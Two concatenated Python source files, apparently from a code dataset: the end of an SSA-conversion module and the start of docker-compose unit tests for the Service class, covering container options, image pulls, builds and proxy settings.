for name, last_name in self.last_definition[node.args[1]].items():
c = ASTConcretizer(last_name,
Name(
self.format_name(name,
self.prev_definition[node][name] - 1)))
walk(else_stmt, c)
else_stmt = c.modified_node[else_stmt]
else_stmts = else_stmt.args if has_else else []
assigned_variables = set(self.last_definition[node.args[1]].keys())
if has_else:
assigned_variables.update(self.last_definition[node.args[2]].keys())
phis = []
for v in assigned_variables:
then_name = (self.last_definition[node.args[1]].get(v) or
self.format_name(v, self.prev_definition[node][v]))
else_name = ((has_else and self.last_definition[node.args[2]].get(v)) or
self.format_name(v, self.prev_definition[node][v] - 1))
phi_name = self.format_name(v, self.definition_counter[v])
phis.append(Node(NT.ASSIGNMENT, [
Name(phi_name),
Node(NT.PHI, [
self.ssa_node[node.args[0]],
Name(then_name),
Name(else_name),
])
]))
self.definition_counter[v] += 1
self.last_definition[node][v] = phi_name
self.ssa_node[node] = Node(NT.STMTLIST, then_stmts + else_stmts + phis)
elif node.kind == NT.ASSIGNMENT:
new_name = self.format_name(
node.args[0].name,
self.definition_counter[node.args[0].name])
self.ssa_node[node] = Node(NT.ASSIGNMENT, [
Name(new_name),
self.ssa_node[node.args[1]]
])
self.last_definition[node][node.args[0].name] = new_name
self.definition_counter[node.args[0].name] += 1
elif node.kind == NT.PARAMLIST:
names = []
for name in node.args:
self.last_definition[node][name.name] = self.format_name(name.name, 0)
self.definition_counter[name.name] = 1
names.append(Name(self.last_definition[node][name.name]))
self.ssa_node[node] = Node(NT.PARAMLIST, names)
else:
children = []
for a in node.args:
children.append(self.ssa_node[a])
for k, v in self.last_definition[a].items():
self.last_definition[node][k] = v
self.ssa_node[node] = Node(node.kind, children)
elif isinstance(node, Name):
self.ssa_node[node] = Name(self.format_name(
node.name,
self.definition_counter[node.name] - 1))
else:
self.ssa_node[node] = node
class FlattenVisitor(Visitor):
def __init__(self):
self.flat_node = {}
def visit(self, node, is_leaving):
if not is_leaving:
self.flat_node[node] = node
return
if isinstance(node, Node) and node.kind == NT.STMTLIST:
children = []
for a in node.args:
c = self.flat_node[a]
if c.kind == NT.STMTLIST:
children.extend(c.args)
else:
children.append(c)
self.flat_node[node] = Node(node.kind, children)
elif isinstance(node, Node):
children = []
for a in node.args:
children.append(self.flat_node[a])
self.flat_node[node] = Node(node.kind, children)
@staticmethod
def flatten(node):
v = FlattenVisitor()
walk(node, v)
return v.flat_node[node]
def ssa(node):
unroller = ASTUnroller()
walk(node, unroller)
node = unroller.unrolled_node[node]
v = SSAVisitor()
walk(node, v)
return FlattenVisitor.flatten(v.ssa_node[node])
| 38.62987 | 92 | 0.525635 | [
"MIT"
] | gpoesia/sketchy | ssa.py | 5,949 | Python |
from __future__ import absolute_import
from __future__ import unicode_literals
import docker
import pytest
from docker.constants import DEFAULT_DOCKER_API_VERSION
from docker.errors import APIError
from docker.errors import NotFound
from .. import mock
from .. import unittest
from compose.config.errors import DependencyError
from compose.config.types import MountSpec
from compose.config.types import ServicePort
from compose.config.types import ServiceSecret
from compose.config.types import VolumeFromSpec
from compose.config.types import VolumeSpec
from compose.const import API_VERSIONS
from compose.const import LABEL_CONFIG_HASH
from compose.const import LABEL_ONE_OFF
from compose.const import LABEL_PROJECT
from compose.const import LABEL_SERVICE
from compose.const import SECRETS_PATH
from compose.container import Container
from compose.errors import OperationFailedError
from compose.parallel import ParallelStreamWriter
from compose.project import OneOffFilter
from compose.service import build_ulimits
from compose.service import build_volume_binding
from compose.service import BuildAction
from compose.service import ContainerNetworkMode
from compose.service import format_environment
from compose.service import formatted_ports
from compose.service import get_container_data_volumes
from compose.service import ImageType
from compose.service import merge_volume_bindings
from compose.service import NeedsBuildError
from compose.service import NetworkMode
from compose.service import NoSuchImageError
from compose.service import parse_repository_tag
from compose.service import Service
from compose.service import ServiceNetworkMode
from compose.service import warn_on_masked_volume
class ServiceTest(unittest.TestCase):
def setUp(self):
self.mock_client = mock.create_autospec(docker.APIClient)
self.mock_client.api_version = DEFAULT_DOCKER_API_VERSION
self.mock_client._general_configs = {}
def test_containers(self):
service = Service('db', self.mock_client, 'myproject', image='foo')
self.mock_client.containers.return_value = []
assert list(service.containers()) == []
def test_containers_with_containers(self):
self.mock_client.containers.return_value = [
dict(Name=str(i), Image='foo', Id=i) for i in range(3)
]
service = Service('db', self.mock_client, 'myproject', image='foo')
assert [c.id for c in service.containers()] == list(range(3))
expected_labels = [
'{0}=myproject'.format(LABEL_PROJECT),
'{0}=db'.format(LABEL_SERVICE),
'{0}=False'.format(LABEL_ONE_OFF),
]
self.mock_client.containers.assert_called_once_with(
all=False,
filters={'label': expected_labels})
def test_container_without_name(self):
self.mock_client.containers.return_value = [
{'Image': 'foo', 'Id': '1', 'Name': '1'},
{'Image': 'foo', 'Id': '2', 'Name': None},
{'Image': 'foo', 'Id': '3'},
]
service = Service('db', self.mock_client, 'myproject', image='foo')
assert [c.id for c in service.containers()] == ['1']
assert service._next_container_number() == 2
assert service.get_container(1).id == '1'
def test_get_volumes_from_container(self):
container_id = 'aabbccddee'
service = Service(
'test',
image='foo',
volumes_from=[
VolumeFromSpec(
mock.Mock(id=container_id, spec=Container),
'rw',
'container')])
assert service._get_volumes_from() == [container_id + ':rw']
def test_get_volumes_from_container_read_only(self):
container_id = 'aabbccddee'
service = Service(
'test',
image='foo',
volumes_from=[
VolumeFromSpec(
mock.Mock(id=container_id, spec=Container),
'ro',
'container')])
assert service._get_volumes_from() == [container_id + ':ro']
def test_get_volumes_from_service_container_exists(self):
container_ids = ['aabbccddee', '12345']
from_service = mock.create_autospec(Service)
from_service.containers.return_value = [
mock.Mock(id=container_id, spec=Container)
for container_id in container_ids
]
service = Service(
'test',
volumes_from=[VolumeFromSpec(from_service, 'rw', 'service')],
image='foo')
assert service._get_volumes_from() == [container_ids[0] + ":rw"]
def test_get_volumes_from_service_container_exists_with_flags(self):
for mode in ['ro', 'rw', 'z', 'rw,z', 'z,rw']:
container_ids = ['aabbccddee:' + mode, '12345:' + mode]
from_service = mock.create_autospec(Service)
from_service.containers.return_value = [
mock.Mock(id=container_id.split(':')[0], spec=Container)
for container_id in container_ids
]
service = Service(
'test',
volumes_from=[VolumeFromSpec(from_service, mode, 'service')],
image='foo')
assert service._get_volumes_from() == [container_ids[0]]
def test_get_volumes_from_service_no_container(self):
container_id = 'abababab'
from_service = mock.create_autospec(Service)
from_service.containers.return_value = []
from_service.create_container.return_value = mock.Mock(
id=container_id,
spec=Container)
service = Service(
'test',
image='foo',
volumes_from=[VolumeFromSpec(from_service, 'rw', 'service')])
assert service._get_volumes_from() == [container_id + ':rw']
from_service.create_container.assert_called_once_with()
def test_memory_swap_limit(self):
self.mock_client.create_host_config.return_value = {}
service = Service(
name='foo',
image='foo',
hostname='name',
client=self.mock_client,
mem_limit=1000000000,
memswap_limit=2000000000)
service._get_container_create_options({'some': 'overrides'}, 1)
assert self.mock_client.create_host_config.called
assert self.mock_client.create_host_config.call_args[1]['mem_limit'] == 1000000000
assert self.mock_client.create_host_config.call_args[1]['memswap_limit'] == 2000000000
def test_self_reference_external_link(self):
service = Service(
name='foo',
external_links=['default_foo_1']
)
with pytest.raises(DependencyError):
service.get_container_name('foo', 1)
def test_mem_reservation(self):
self.mock_client.create_host_config.return_value = {}
service = Service(
name='foo',
image='foo',
hostname='name',
client=self.mock_client,
mem_reservation='512m'
)
service._get_container_create_options({'some': 'overrides'}, 1)
assert self.mock_client.create_host_config.called is True
assert self.mock_client.create_host_config.call_args[1]['mem_reservation'] == '512m'
def test_cgroup_parent(self):
self.mock_client.create_host_config.return_value = {}
service = Service(
name='foo',
image='foo',
hostname='name',
client=self.mock_client,
cgroup_parent='test')
service._get_container_create_options({'some': 'overrides'}, 1)
assert self.mock_client.create_host_config.called
assert self.mock_client.create_host_config.call_args[1]['cgroup_parent'] == 'test'
def test_log_opt(self):
self.mock_client.create_host_config.return_value = {}
log_opt = {'syslog-address': 'tcp://192.168.0.42:123'}
logging = {'driver': 'syslog', 'options': log_opt}
service = Service(
name='foo',
image='foo',
hostname='name',
client=self.mock_client,
log_driver='syslog',
logging=logging)
service._get_container_create_options({'some': 'overrides'}, 1)
assert self.mock_client.create_host_config.called
assert self.mock_client.create_host_config.call_args[1]['log_config'] == {
'Type': 'syslog', 'Config': {'syslog-address': 'tcp://192.168.0.42:123'}
}
def test_stop_grace_period(self):
self.mock_client.api_version = '1.25'
self.mock_client.create_host_config.return_value = {}
service = Service(
'foo',
image='foo',
client=self.mock_client,
stop_grace_period="1m35s")
opts = service._get_container_create_options({'image': 'foo'}, 1)
assert opts['stop_timeout'] == 95
def test_split_domainname_none(self):
service = Service(
'foo',
image='foo',
hostname='name.domain.tld',
client=self.mock_client)
opts = service._get_container_create_options({'image': 'foo'}, 1)
assert opts['hostname'] == 'name.domain.tld', 'hostname'
assert not ('domainname' in opts), 'domainname'
def test_split_domainname_fqdn(self):
self.mock_client.api_version = '1.22'
service = Service(
'foo',
hostname='name.domain.tld',
image='foo',
client=self.mock_client)
opts = service._get_container_create_options({'image': 'foo'}, 1)
assert opts['hostname'] == 'name', 'hostname'
assert opts['domainname'] == 'domain.tld', 'domainname'
def test_split_domainname_both(self):
self.mock_client.api_version = '1.22'
service = Service(
'foo',
hostname='name',
image='foo',
domainname='domain.tld',
client=self.mock_client)
opts = service._get_container_create_options({'image': 'foo'}, 1)
assert opts['hostname'] == 'name', 'hostname'
assert opts['domainname'] == 'domain.tld', 'domainname'
def test_split_domainname_weird(self):
self.mock_client.api_version = '1.22'
service = Service(
'foo',
hostname='name.sub',
domainname='domain.tld',
image='foo',
client=self.mock_client)
opts = service._get_container_create_options({'image': 'foo'}, 1)
assert opts['hostname'] == 'name.sub', 'hostname'
assert opts['domainname'] == 'domain.tld', 'domainname'
def test_no_default_hostname_when_not_using_networking(self):
service = Service(
'foo',
image='foo',
use_networking=False,
client=self.mock_client,
)
opts = service._get_container_create_options({'image': 'foo'}, 1)
assert opts.get('hostname') is None
def test_get_container_create_options_with_name_option(self):
service = Service(
'foo',
image='foo',
client=self.mock_client,
container_name='foo1')
name = 'the_new_name'
opts = service._get_container_create_options(
{'name': name},
1,
one_off=OneOffFilter.only)
assert opts['name'] == name
def test_get_container_create_options_does_not_mutate_options(self):
labels = {'thing': 'real'}
environment = {'also': 'real'}
service = Service(
'foo',
image='foo',
labels=dict(labels),
client=self.mock_client,
environment=dict(environment),
)
self.mock_client.inspect_image.return_value = {'Id': 'abcd'}
prev_container = mock.Mock(
id='ababab',
image_config={'ContainerConfig': {}})
prev_container.get.return_value = None
opts = service._get_container_create_options(
{},
1,
previous_container=prev_container)
assert service.options['labels'] == labels
assert service.options['environment'] == environment
assert opts['labels'][LABEL_CONFIG_HASH] == \
'2524a06fcb3d781aa2c981fc40bcfa08013bb318e4273bfa388df22023e6f2aa'
assert opts['environment'] == ['also=real']
def test_get_container_create_options_sets_affinity_with_binds(self):
service = Service(
'foo',
image='foo',
client=self.mock_client,
)
self.mock_client.inspect_image.return_value = {'Id': 'abcd'}
prev_container = mock.Mock(
id='ababab',
image_config={'ContainerConfig': {'Volumes': ['/data']}})
def container_get(key):
return {
'Mounts': [
{
'Destination': '/data',
'Source': '/some/path',
'Name': 'abab1234',
},
]
}.get(key, None)
prev_container.get.side_effect = container_get
opts = service._get_container_create_options(
{},
1,
previous_container=prev_container)
assert opts['environment'] == ['affinity:container==ababab']
def test_get_container_create_options_no_affinity_without_binds(self):
service = Service('foo', image='foo', client=self.mock_client)
self.mock_client.inspect_image.return_value = {'Id': 'abcd'}
prev_container = mock.Mock(
id='ababab',
image_config={'ContainerConfig': {}})
prev_container.get.return_value = None
opts = service._get_container_create_options(
{},
1,
previous_container=prev_container)
assert opts['environment'] == []
def test_get_container_not_found(self):
self.mock_client.containers.return_value = []
service = Service('foo', client=self.mock_client, image='foo')
with pytest.raises(ValueError):
service.get_container()
@mock.patch('compose.service.Container', autospec=True)
def test_get_container(self, mock_container_class):
container_dict = dict(Name='default_foo_2')
self.mock_client.containers.return_value = [container_dict]
service = Service('foo', image='foo', client=self.mock_client)
container = service.get_container(number=2)
assert container == mock_container_class.from_ps.return_value
mock_container_class.from_ps.assert_called_once_with(
self.mock_client, container_dict)
@mock.patch('compose.service.log', autospec=True)
def test_pull_image(self, mock_log):
service = Service('foo', client=self.mock_client, image='someimage:sometag')
service.pull()
self.mock_client.pull.assert_called_once_with(
'someimage',
tag='sometag',
stream=True,
platform=None)
mock_log.info.assert_called_once_with('Pulling foo (someimage:sometag)...')
def test_pull_image_no_tag(self):
service = Service('foo', client=self.mock_client, image='ababab')
service.pull()
self.mock_client.pull.assert_called_once_with(
'ababab',
tag='latest',
stream=True,
platform=None)
@mock.patch('compose.service.log', autospec=True)
def test_pull_image_digest(self, mock_log):
service = Service('foo', client=self.mock_client, image='someimage@sha256:1234')
service.pull()
self.mock_client.pull.assert_called_once_with(
'someimage',
tag='sha256:1234',
stream=True,
platform=None)
mock_log.info.assert_called_once_with('Pulling foo (someimage@sha256:1234)...')
@mock.patch('compose.service.log', autospec=True)
def test_pull_image_with_platform(self, mock_log):
self.mock_client.api_version = '1.35'
service = Service(
'foo', client=self.mock_client, image='someimage:sometag', platform='windows/x86_64'
)
service.pull()
assert self.mock_client.pull.call_count == 1
call_args = self.mock_client.pull.call_args
assert call_args[1]['platform'] == 'windows/x86_64'
@mock.patch('compose.service.log', autospec=True)
def test_pull_image_with_platform_unsupported_api(self, mock_log):
self.mock_client.api_version = '1.33'
service = Service(
'foo', client=self.mock_client, image='someimage:sometag', platform='linux/arm'
)
with pytest.raises(OperationFailedError):
service.pull()
def test_pull_image_with_default_platform(self):
self.mock_client.api_version = '1.35'
service = Service(
'foo', client=self.mock_client, image='someimage:sometag',
default_platform='linux'
)
assert service.platform == 'linux'
service.pull()
assert self.mock_client.pull.call_count == 1
call_args = self.mock_client.pull.call_args
assert call_args[1]['platform'] == 'linux'
@mock.patch('compose.service.Container', autospec=True)
def test_recreate_container(self, _):
mock_container = mock.create_autospec(Container)
service = Service('foo', client=self.mock_client, image='someimage')
service.image = lambda: {'Id': 'abc123'}
new_container = service.recreate_container(mock_container)
mock_container.stop.assert_called_once_with(timeout=10)
mock_container.rename_to_tmp_name.assert_called_once_with()
new_container.start.assert_called_once_with()
mock_container.remove.assert_called_once_with()
@mock.patch('compose.service.Container', autospec=True)
def test_recreate_container_with_timeout(self, _):
mock_container = mock.create_autospec(Container)
self.mock_client.inspect_image.return_value = {'Id': 'abc123'}
service = Service('foo', client=self.mock_client, image='someimage')
service.recreate_container(mock_container, timeout=1)
mock_container.stop.assert_called_once_with(timeout=1)
def test_parse_repository_tag(self):
assert parse_repository_tag("root") == ("root", "", ":")
assert parse_repository_tag("root:tag") == ("root", "tag", ":")
assert parse_repository_tag("user/repo") == ("user/repo", "", ":")
assert parse_repository_tag("user/repo:tag") == ("user/repo", "tag", ":")
assert parse_repository_tag("url:5000/repo") == ("url:5000/repo", "", ":")
assert parse_repository_tag("url:5000/repo:tag") == ("url:5000/repo", "tag", ":")
assert parse_repository_tag("root@sha256:digest") == ("root", "sha256:digest", "@")
assert parse_repository_tag("user/repo@sha256:digest") == ("user/repo", "sha256:digest", "@")
assert parse_repository_tag("url:5000/repo@sha256:digest") == (
"url:5000/repo", "sha256:digest", "@"
)
def test_create_container(self):
service = Service('foo', client=self.mock_client, build={'context': '.'})
self.mock_client.inspect_image.side_effect = [
NoSuchImageError,
{'Id': 'abc123'},
]
self.mock_client.build.return_value = [
'{"stream": "Successfully built abcd"}',
]
with mock.patch('compose.service.log', autospec=True) as mock_log:
service.create_container()
assert mock_log.warn.called
_, args, _ = mock_log.warn.mock_calls[0]
assert 'was built because it did not already exist' in args[0]
assert self.mock_client.build.call_count == 1
self.mock_client.build.call_args[1]['tag'] == 'default_foo'
def test_ensure_image_exists_no_build(self):
service = Service('foo', client=self.mock_client, build={'context': '.'})
self.mock_client.inspect_image.return_value = {'Id': 'abc123'}
service.ensure_image_exists(do_build=BuildAction.skip)
assert not self.mock_client.build.called
def test_ensure_image_exists_no_build_but_needs_build(self):
service = Service('foo', client=self.mock_client, build={'context': '.'})
self.mock_client.inspect_image.side_effect = NoSuchImageError
with pytest.raises(NeedsBuildError):
service.ensure_image_exists(do_build=BuildAction.skip)
def test_ensure_image_exists_force_build(self):
service = Service('foo', client=self.mock_client, build={'context': '.'})
self.mock_client.inspect_image.return_value = {'Id': 'abc123'}
self.mock_client.build.return_value = [
'{"stream": "Successfully built abcd"}',
]
with mock.patch('compose.service.log', autospec=True) as mock_log:
service.ensure_image_exists(do_build=BuildAction.force)
assert not mock_log.warn.called
assert self.mock_client.build.call_count == 1
self.mock_client.build.call_args[1]['tag'] == 'default_foo'
def test_build_does_not_pull(self):
self.mock_client.build.return_value = [
b'{"stream": "Successfully built 12345"}',
]
service = Service('foo', client=self.mock_client, build={'context': '.'})
service.build()
assert self.mock_client.build.call_count == 1
assert not self.mock_client.build.call_args[1]['pull']
def test_build_with_platform(self):
self.mock_client.api_version = '1.35'
self.mock_client.build.return_value = [
b'{"stream": "Successfully built 12345"}',
]
service = Service('foo', client=self.mock_client, build={'context': '.'}, platform='linux')
service.build()
assert self.mock_client.build.call_count == 1
call_args = self.mock_client.build.call_args
assert call_args[1]['platform'] == 'linux'
def test_build_with_default_platform(self):
self.mock_client.api_version = '1.35'
self.mock_client.build.return_value = [
b'{"stream": "Successfully built 12345"}',
]
service = Service(
'foo', client=self.mock_client, build={'context': '.'},
default_platform='linux'
)
assert service.platform == 'linux'
service.build()
assert self.mock_client.build.call_count == 1
call_args = self.mock_client.build.call_args
assert call_args[1]['platform'] == 'linux'
def test_service_platform_precedence(self):
self.mock_client.api_version = '1.35'
service = Service(
'foo', client=self.mock_client, platform='linux/arm',
default_platform='osx'
)
assert service.platform == 'linux/arm'
def test_service_ignore_default_platform_with_unsupported_api(self):
self.mock_client.api_version = '1.32'
self.mock_client.build.return_value = [
b'{"stream": "Successfully built 12345"}',
]
service = Service(
'foo', client=self.mock_client, default_platform='windows', build={'context': '.'}
)
assert service.platform is None
service.build()
assert self.mock_client.build.call_count == 1
call_args = self.mock_client.build.call_args
assert call_args[1]['platform'] is None
def test_build_with_override_build_args(self):
self.mock_client.build.return_value = [
b'{"stream": "Successfully built 12345"}',
]
build_args = {
'arg1': 'arg1_new_value',
}
service = Service('foo', client=self.mock_client,
build={'context': '.', 'args': {'arg1': 'arg1', 'arg2': 'arg2'}})
service.build(build_args_override=build_args)
called_build_args = self.mock_client.build.call_args[1]['buildargs']
assert called_build_args['arg1'] == build_args['arg1']
assert called_build_args['arg2'] == 'arg2'
def test_build_with_isolation_from_service_config(self):
self.mock_client.build.return_value = [
b'{"stream": "Successfully built 12345"}',
]
service = Service('foo', client=self.mock_client, build={'context': '.'}, isolation='hyperv')
service.build()
assert self.mock_client.build.call_count == 1
called_build_args = self.mock_client.build.call_args[1]
assert called_build_args['isolation'] == 'hyperv'
def test_build_isolation_from_build_override_service_config(self):
self.mock_client.build.return_value = [
b'{"stream": "Successfully built 12345"}',
]
service = Service(
'foo', client=self.mock_client, build={'context': '.', 'isolation': 'default'},
isolation='hyperv'
)
service.build()
assert self.mock_client.build.call_count == 1
called_build_args = self.mock_client.build.call_args[1]
assert called_build_args['isolation'] == 'default'
def test_config_dict(self):
self.mock_client.inspect_image.return_value = {'Id': 'abcd'}
service = Service(
'foo',
image='example.com/foo',
client=self.mock_client,
network_mode=ServiceNetworkMode(Service('other')),
networks={'default': None},
links=[(Service('one'), 'one')],
volumes_from=[VolumeFromSpec(Service('two'), 'rw', 'service')])
config_dict = service.config_dict()
expected = {
'image_id': 'abcd',
'options': {'image': 'example.com/foo'},
'links': [('one', 'one')],
'net': 'other',
'networks': {'default': None},
'volumes_from': [('two', 'rw')],
}
assert config_dict == expected
def test_config_dict_with_network_mode_from_container(self):
self.mock_client.inspect_image.return_value = {'Id': 'abcd'}
container = Container(
self.mock_client,
{'Id': 'aaabbb', 'Name': '/foo_1'})
service = Service(
'foo',
image='example.com/foo',
client=self.mock_client,
network_mode=ContainerNetworkMode(container))
config_dict = service.config_dict()
expected = {
'image_id': 'abcd',
'options': {'image': 'example.com/foo'},
'links': [],
'networks': {},
'net': 'aaabbb',
'volumes_from': [],
}
assert config_dict == expected
def test_config_hash_matches_label(self):
self.mock_client.inspect_image.return_value = {'Id': 'abcd'}
service = Service(
'foo',
image='example.com/foo',
client=self.mock_client,
network_mode=NetworkMode('bridge'),
networks={'bridge': {}, 'net2': {}},
links=[(Service('one', client=self.mock_client), 'one')],
volumes_from=[VolumeFromSpec(Service('two', client=self.mock_client), 'rw', 'service')],
volumes=[VolumeSpec('/ext', '/int', 'ro')],
build={'context': 'some/random/path'},
)
config_hash = service.config_hash
for api_version in set(API_VERSIONS.values()):
self.mock_client.api_version = api_version
assert service._get_container_create_options({}, 1)['labels'][LABEL_CONFIG_HASH] == (
config_hash
)
def test_remove_image_none(self):
web = Service('web', image='example', client=self.mock_client)
assert not web.remove_image(ImageType.none)
assert not self.mock_client.remove_image.called
def test_remove_image_local_with_image_name_doesnt_remove(self):
web = Service('web', image='example', client=self.mock_client)
assert not web.remove_image(ImageType.local)
assert not self.mock_client.remove_image.called
def test_remove_image_local_without_image_name_does_remove(self):
web = Service('web', build='.', client=self.mock_client)
assert web.remove_image(ImageType.local)
self.mock_client.remove_image.assert_called_once_with(web.image_name)
def test_remove_image_all_does_remove(self):
web = Service('web', image='example', client=self.mock_client)
assert web.remove_image(ImageType.all)
self.mock_client.remove_image.assert_called_once_with(web.image_name)
def test_remove_image_with_error(self):
self.mock_client.remove_image.side_effect = error = APIError(
message="testing",
response={},
explanation="Boom")
web = Service('web', image='example', client=self.mock_client)
with mock.patch('compose.service.log', autospec=True) as mock_log:
assert not web.remove_image(ImageType.all)
mock_log.error.assert_called_once_with(
"Failed to remove image for service %s: %s", web.name, error)
def test_specifies_host_port_with_no_ports(self):
service = Service(
'foo',
image='foo')
assert not service.specifies_host_port()
def test_specifies_host_port_with_container_port(self):
service = Service(
'foo',
image='foo',
ports=["2000"])
assert not service.specifies_host_port()
def test_specifies_host_port_with_host_port(self):
service = Service(
'foo',
image='foo',
ports=["1000:2000"])
assert service.specifies_host_port()
def test_specifies_host_port_with_host_ip_no_port(self):
service = Service(
'foo',
image='foo',
ports=["127.0.0.1::2000"])
assert not service.specifies_host_port()
def test_specifies_host_port_with_host_ip_and_port(self):
service = Service(
'foo',
image='foo',
ports=["127.0.0.1:1000:2000"])
assert service.specifies_host_port()
def test_specifies_host_port_with_container_port_range(self):
service = Service(
'foo',
image='foo',
ports=["2000-3000"])
assert not service.specifies_host_port()
def test_specifies_host_port_with_host_port_range(self):
service = Service(
'foo',
image='foo',
ports=["1000-2000:2000-3000"])
assert service.specifies_host_port()
def test_specifies_host_port_with_host_ip_no_port_range(self):
service = Service(
'foo',
image='foo',
ports=["127.0.0.1::2000-3000"])
assert not service.specifies_host_port()
def test_specifies_host_port_with_host_ip_and_port_range(self):
service = Service(
'foo',
image='foo',
ports=["127.0.0.1:1000-2000:2000-3000"])
assert service.specifies_host_port()
def test_image_name_from_config(self):
image_name = 'example/web:latest'
service = Service('foo', image=image_name)
assert service.image_name == image_name
def test_image_name_default(self):
service = Service('foo', project='testing')
assert service.image_name == 'testing_foo'
@mock.patch('compose.service.log', autospec=True)
def test_only_log_warning_when_host_ports_clash(self, mock_log):
self.mock_client.inspect_image.return_value = {'Id': 'abcd'}
ParallelStreamWriter.instance = None
name = 'foo'
service = Service(
name,
client=self.mock_client,
ports=["8080:80"])
service.scale(0)
assert not mock_log.warn.called
service.scale(1)
assert not mock_log.warn.called
service.scale(2)
mock_log.warn.assert_called_once_with(
'The "{}" service specifies a port on the host. If multiple containers '
'for this service are created on a single host, the port will clash.'.format(name))
def test_parse_proxy_config(self):
default_proxy_config = {
'httpProxy': 'http://proxy.mycorp.com:3128',
'httpsProxy': 'https://user:[email protected]:3129',
'ftpProxy': 'http://ftpproxy.mycorp.com:21',
'noProxy': '*.intra.mycorp.com',
}
self.mock_client.base_url = 'http+docker://localunixsocket'
self.mock_client._general_configs = {
'proxies': {
'default': default_proxy_config,
}
}
service = Service('foo', client=self.mock_client)
assert service._parse_proxy_config() == {
'HTTP_PROXY': default_proxy_config['httpProxy'],
'http_proxy': default_proxy_config['httpProxy'],
'HTTPS_PROXY': default_proxy_config['httpsProxy'],
'https_proxy': default_proxy_config['httpsProxy'],
'FTP_PROXY': default_proxy_config['ftpProxy'],
'ftp_proxy': default_proxy_config['ftpProxy'],
'NO_PROXY': default_proxy_config['noProxy'],
'no_proxy': default_proxy_config['noProxy'],
}
def test_parse_proxy_config_per_host(self):
default_proxy_config = {
'httpProxy': 'http://proxy.mycorp.com:3128',
'httpsProxy': 'https://user:[email protected]:3129',
'ftpProxy': 'http://ftpproxy.mycorp.com:21',
'noProxy': '*.intra.mycorp.com',
}
host_specific_proxy_config = {
'httpProxy': 'http://proxy.example.com:3128',
'httpsProxy': 'https://user:[email protected]:3129',
'ftpProxy': 'http://ftpproxy.example.com:21',
'noProxy': '*.intra.example.com'
}
self.mock_client.base_url = 'http+docker://localunixsocket'
self.mock_client._general_configs = {
'proxies': {
'default': default_proxy_config,
'tcp://example.docker.com:2376': host_specific_proxy_config,
}
}
service = Service('foo', client=self.mock_client)
assert service._parse_proxy_config() == {
'HTTP_PROXY': default_proxy_config['httpProxy'],
'http_proxy': default_proxy_config['httpProxy'],
'HTTPS_PROXY': default_proxy_config['httpsProxy'],
'https_proxy': default_proxy_config['httpsProxy'],
'FTP_PROXY': default_proxy_config['ftpProxy'],
'ftp_proxy': default_proxy_config['ftpProxy'],
'NO_PROXY': default_proxy_config['noProxy'],
'no_proxy': default_proxy_config['noProxy'],
}
self.mock_client._original_base_url = 'tcp://example.docker.com:2376'
assert service._parse_proxy_config() == {
'HTTP_PROXY': host_specific_proxy_config['httpProxy'],
'http_proxy': host_specific_proxy_config['httpProxy'],
'HTTPS_PROXY': host_specific_proxy_config['httpsProxy'],
'https_proxy': host_specific_proxy_config['httpsProxy'],
'FTP_PROXY': host_specific_proxy_config['ftpProxy'],
'ftp_proxy': host_specific_proxy_config['ftpProxy'],
'NO_PROXY': host_specific_proxy_config['noProxy'],
'no_proxy': host_specific_proxy_config['noProxy'],
}
def test_build_service_with_proxy_config(self):
default_proxy_config = {
'httpProxy': 'http://proxy.mycorp.com:3128',
'httpsProxy': 'https://user:[email protected]:3129',
}
buildargs = {
'HTTPS_PROXY': 'https://rdcf.th08.jp:8911',
'https_proxy': 'https://rdcf.th08.jp:8911',
}
self.mock_client._general_configs = {
'proxies': {
'default': default_proxy_config,
}
}
self.mock_client.base_url = 'http+docker://localunixsocket'
self.mock_client.build.return_value = [
b'{"stream": "Successfully built 12345"}',
]
service = Service('foo', client=self.mock_client, build={'context': '.', 'args': buildargs})
service.build()
assert self.mock_client.build.call_count == 1
assert self.mock_client.build.call_args[1]['buildargs'] == {
'HTTP_PROXY': default_proxy_config['httpProxy'],
'http_proxy': default_proxy_config['httpProxy'],
'HTTPS_PROXY': buildargs['HTTPS_PROXY'],
'https_proxy': buildargs['HTTPS_PROXY'],
}
def test_get_create_options_with_proxy_config(self):
default_proxy_config = {
'httpProxy': 'http://proxy.mycorp.com:3128',
'httpsProxy': 'https://user:[email protected]:3129',
'ftpProxy': 'http://ftpproxy.mycorp.com:21',
}
self.mock_client._general_configs = {
'proxies': {
'default': default_proxy_config,
}
}
self.mock_client.base_url = 'http+docker://localunixsocket'
override_options = {
'environment': {
'FTP_PROXY': 'ftp://xdge.exo.au:21',
'ftp_proxy': 'ftp://xdge.exo.au:21',
}
}
environment = {
'HTTPS_PROXY': 'https://rdcf.th08.jp:8911',
'https_proxy': 'https://rdcf.th08.jp:8911',
}
service = Service('foo', client=self.mock_client, environment=environment)
create_opts = service._get_container_create_options(override_options, 1)
assert set(create_opts['environment']) == set(format_environment({
'HTTP_PROXY': default_proxy_config['httpProxy'],
'http_proxy': default_proxy_config['httpProxy'],
'HTTPS_PROXY': environment['HTTPS_PROXY'],
'https_proxy': environment['HTTPS_PROXY'],
'FTP_PROXY': override_options['environment']['FTP_PROXY'],
'ftp_proxy': override_options['environment']['FTP_PROXY'],
}))
def test_create_when_removed_containers_are_listed(self):
# This is aimed at simulating a race between the API call to list the
# containers, and the ones to inspect each of the listed containers.
# It can happen that a container has been removed after we listed it.
# containers() returns a container that is about to be removed
self.mock_client.containers.return_value = [
{'Id': 'rm_cont_id', 'Name': 'rm_cont', 'Image': 'img_id'},
]
# inspect_container() will raise a NotFound when trying to inspect
# rm_cont_id, which at this point has been removed
def inspect(name):
if name == 'rm_cont_id':
raise NotFound(message='Not Found')
if name == 'new_cont_id':
return {'Id': 'new_cont_id'}
raise NotImplementedError("incomplete mock")
self.mock_client.inspect_container.side_effect = inspect
self.mock_client.inspect_image.return_value = {'Id': 'imageid'}
self.mock_client.create_container.return_value = {'Id': 'new_cont_id'}
# We should nonetheless be able to create a new container
service = Service('foo', client=self.mock_client)
assert service.create_container().id == 'new_cont_id'
def test_build_volume_options_duplicate_binds(self):
self.mock_client.api_version = '1.29' # Trigger 3.2 format workaround
service = Service('foo', client=self.mock_client)
ctnr_opts, override_opts = service._build_container_volume_options(
previous_container=None,
container_options={
'volumes': [
MountSpec.parse({'source': 'vol', 'target': '/data', 'type': 'volume'}),
VolumeSpec.parse('vol:/data:rw'),
],
'environment': {},
},
override_options={},
)
assert 'binds' in override_opts
assert len(override_opts['binds']) == 1
assert override_opts['binds'][0] == 'vol:/data:rw'
class TestServiceNetwork(unittest.TestCase):
def setUp(self):
self.mock_client = mock.create_autospec(docker.APIClient)
self.mock_client.api_version = DEFAULT_DOCKER_API_VERSION
self.mock_client._general_configs = {}
